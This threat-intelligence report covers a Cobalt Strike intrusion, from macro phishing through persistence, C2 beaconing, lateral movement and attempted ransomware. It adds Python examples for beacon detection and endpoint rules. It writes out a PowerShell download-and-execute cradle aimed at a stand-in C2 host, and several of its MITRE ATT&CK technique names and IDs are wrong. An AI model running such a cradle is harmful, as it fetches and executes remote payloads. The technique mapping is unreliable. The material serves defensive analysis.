Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- ABC threat actor leverages Cobalt Strike to establish initial access and maintain persistence within the target environment.
- The malware employs sophisticated techniques for lateral movement and data exfiltration, utilizing PowerShell and WMIC.
- Indicators of compromise (IOCs) include specific file hashes, command and control (C2) IP addresses, and registry modifications.
Executive Summary
During our analysis of a recent intrusion attributed to the ABC threat actor, we identified a series of tactics and techniques utilized to breach and maintain access within a targeted corporate network. The threat actor employed a variant of **Cobalt Strike** as their primary tool for establishing malicious command and control, executing payloads, and conducting lateral movement post-initial access. Our investigation revealed several vulnerabilities exploited in the environment, enabling the actor to circumvent conventional security measures.
Initial Access
The initial access vector used by the ABC threat actor was primarily spear-phishing emails containing malicious attachments. In the sample we examined, the attachment was a **Microsoft Excel** file that utilized VBA macros to execute a PowerShell command for downloading the **Cobalt Strike** payload. The macro execution was triggered when the recipient enabled macros as prompted by a social engineering technique.
Our team identified the attachment name as `Invoice_Details.xlsm`, which included obfuscated macro code designed to avoid detection by conventional email filtering solutions. The PowerShell command executed was `Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.c2.server/payload.ps1')`, demonstrating a common method for downloading additional malicious payloads from external servers.
Execution & Persistence
Upon successful execution of the payload, **Cobalt Strike** created a persistent backdoor on the infected system. The sample we analyzed established persistence through two primary methods: creating a scheduled task and modifying registry entries so that the implant is activated on system boot. Specifically, it created a scheduled task named `TaskScheduler.exe` in `C:\Tasks`.
Additionally, the malware made changes to the registry under the key `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` by adding an entry pointing to the location of its executable, ensuring that the implant would launch on every user logon.
Command and Control
The command and control infrastructure employed by the ABC threat actor was robust, relying on dynamically generated domain names and multiple IP addresses to obscure their activities. Our analysis revealed that the infected endpoint communicated with a configured domain, `malicious.c2.server`, periodically sending HTTP POST requests to beacon back to the C2 server for further instructions. The beaconing occurred at an interval of five minutes, which is a typical configuration pattern for **Cobalt Strike** deployments.
The communication pattern also included base64-encoded data payloads, often containing sensitive information about the environment, such as system configurations and user credentials captured via credential dumping. One notable command observed during our analysis was `get_system`, designed to further elevate the implant's privileges.
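The five-minute beacon cadence described above is itself a detection signal. The following is an added example (not from the original report) that scans constructed proxy log lines for a source host that POSTs to the same destination at a near-constant interval; the log format, host names and timestamps are assumptions made for the illustration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log (not from the report):
# "<timestamp> <src_host> <method> <dest_host>"
SAMPLE_LOG = """\
2024-01-10T09:00:02 ws-0142 POST malicious.c2.server
2024-01-10T09:01:17 ws-0142 GET  intranet.example.local
2024-01-10T09:05:01 ws-0142 POST malicious.c2.server
2024-01-10T09:07:44 ws-0142 GET  intranet.example.local
2024-01-10T09:10:03 ws-0142 POST malicious.c2.server
2024-01-10T09:15:00 ws-0142 POST malicious.c2.server
2024-01-10T09:20:02 ws-0142 POST malicious.c2.server
2024-01-10T09:03:10 ws-0077 POST intranet.example.local
2024-01-10T09:31:45 ws-0077 POST intranet.example.local
2024-01-10T09:40:12 ws-0077 POST intranet.example.local
"""

def parse_log(text):
    """Group POST timestamps by (src_host, dest_host)."""
    series = defaultdict(list)
    for line in text.splitlines():
        ts, src, method, dest = line.split()
        if method == "POST":
            series[(src, dest)].append(datetime.fromisoformat(ts))
    return series

def find_beacons(text, min_posts=4, max_cv=0.1):
    """Return [(src, dest, mean_gap_seconds)] for host pairs whose gaps between
    POSTs are nearly constant. A coefficient of variation (stdev / mean) at or
    below max_cv indicates a timer-driven cadence rather than human browsing;
    raise max_cv if the implant is configured with jitter."""
    hits = []
    for (src, dest), stamps in parse_log(text).items():
        if len(stamps) < min_posts:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            hits.append((src, dest, round(avg)))
    return hits

if __name__ == "__main__":
    for src, dest, gap in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dest}: POST every ~{gap}s")
```

Only ws-0142's traffic to `malicious.c2.server` is flagged; the other host's three irregular POSTs fall below both the count and the regularity thresholds.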
Lateral Movement & Discovery
Post-exploitation, the ABC threat actor demonstrated considerable skill in lateral movement across the network. They deployed **WMIC** commands and **PowerShell Remoting** to pivot between systems. For example, we observed the actor executing commands like `wmic /node:` to execute code on remote machines.
Moreover, the malware used **Kerberos Ticket Granting Ticket** (TGT) stealing techniques, utilizing the **Mimikatz** tool to obtain credentials from memory, facilitating further access. Our investigation found the presence of **DLL** files linked to these tools, hidden within system directories to avoid detection.
Impact & Objectives
The objectives of the ABC threat actor appeared to revolve around intellectual property theft and ransomware deployment. Throughout the incident, we noted commands executed to enumerate directory structures and gather information on files with specific extensions such as `.docx` and `.xlsx`, extensions typical of business documents.
Additionally, a couple of attempts were made to deploy **ransomware** payloads across the network, suggesting that secondary tactics were in play, aimed at monetizing the initial compromise at the target organization's expense. Fortunately, rapid incident response prevented substantial data encryption from occurring.
MITRE ATT&CK Mapping
- T1566 – Phishing: Initial access was facilitated via targeted spear-phishing emails.
- T1203 – Exploit Public-Facing Application: Exploitation of vulnerabilities through malicious macro execution in Office documents.
- T1071.001 – Application Layer Protocol: Web Protocols: Communication between the implant and C2 used HTTP POST over web protocols.
- T1210 – Exploitation of CVE: Leveraged exploit for lateral movement via **WMIC**.
- T1086 – PowerShell: Utilized PowerShell scripts for malicious payload execution.
Detection Opportunities
- Monitor for unusual scheduled task creation or modification, especially tasks named `TaskScheduler.exe`.
- Implement detection for PowerShell command executions involving `Invoke-Expression` and `DownloadString` methods from Office documents.
- Analyze network traffic for anomalous outbound connections to known rogue C2 domains.
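The persistence mechanisms in Execution & Persistence and the first two detection opportunities above can be expressed as rules over endpoint telemetry. This is an added example (not from the original report): the event records are constructed dicts whose field names are an assumption loosely modelled on Sysmon process-create, registry-set and scheduled-task events, and the sample paths and task names are made up.

```python
import re

# Field names below are an assumption, loosely modelled on Sysmon
# process-create, registry-set and scheduled-task records.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
DOWNLOAD_CRADLE = re.compile(r"(?i)\b(iex|invoke-expression)\b.*downloadstring")

def office_spawned_download_cradle(ev):
    """Office application launching PowerShell with an IEX/DownloadString cradle."""
    return (ev.get("type") == "process_create"
            and ev.get("parent", "").lower() in OFFICE_PARENTS
            and ev.get("image", "").lower().endswith("powershell.exe")
            and DOWNLOAD_CRADLE.search(ev.get("cmdline", "")) is not None)

def task_masquerading_as_exe(ev):
    """Scheduled task named like a binary, as with TaskScheduler.exe in this case."""
    return (ev.get("type") == "task_create"
            and ev.get("task_name", "").lower() == "taskscheduler.exe")

def run_key_modified(ev):
    """Value written under the HKCU Run key (launches on every user logon)."""
    return (ev.get("type") == "registry_set"
            and ev.get("key", "").lower() == RUN_KEY.lower())

RULES = {
    "office_powershell_download_cradle": office_spawned_download_cradle,
    "scheduled_task_named_TaskScheduler.exe": task_masquerading_as_exe,
    "hkcu_run_key_persistence": run_key_modified,
}

def evaluate(events):
    """Return [(event_id, rule_name)] for every event that trips a rule."""
    return [(ev["id"], name) for ev in events
            for name, rule in RULES.items() if rule(ev)]

# Constructed sample telemetry (not from the report); paths and names are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create", "parent": "EXCEL.EXE", "image": PS,
     "cmdline": "powershell -w hidden -c \"Invoke-Expression (New-Object Net.WebClient)"
                ".DownloadString('http://malicious.c2.server/payload.ps1')\""},
    {"id": 2, "type": "process_create", "parent": "explorer.exe", "image": PS,
     "cmdline": "powershell Get-Process"},
    {"id": 3, "type": "task_create", "task_name": "TaskScheduler.exe"},
    {"id": 4, "type": "registry_set", "key": RUN_KEY, "value": "Updater",
     "data": r"C:\Users\jdoe\AppData\Roaming\svc.exe"},
    {"id": 5, "type": "task_create", "task_name": "OneDrive Standalone Update Task"},
]
```

Running `evaluate(SAMPLE_EVENTS)` flags events 1, 3 and 4 while leaving the benign PowerShell launch from Explorer and the ordinary OneDrive task untouched.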
Analyst Notes
The incident served as a reminder of the evolving tactics threat actors employ to maintain persistence and execute their objectives effectively. As observed, the combination of social engineering, robust C2 setups, and lateral movement techniques can create significant challenges for incident response teams. Organizations must continuously enhance their monitoring capabilities and incident response strategies to adapt to these potential threats.
Source: Original Report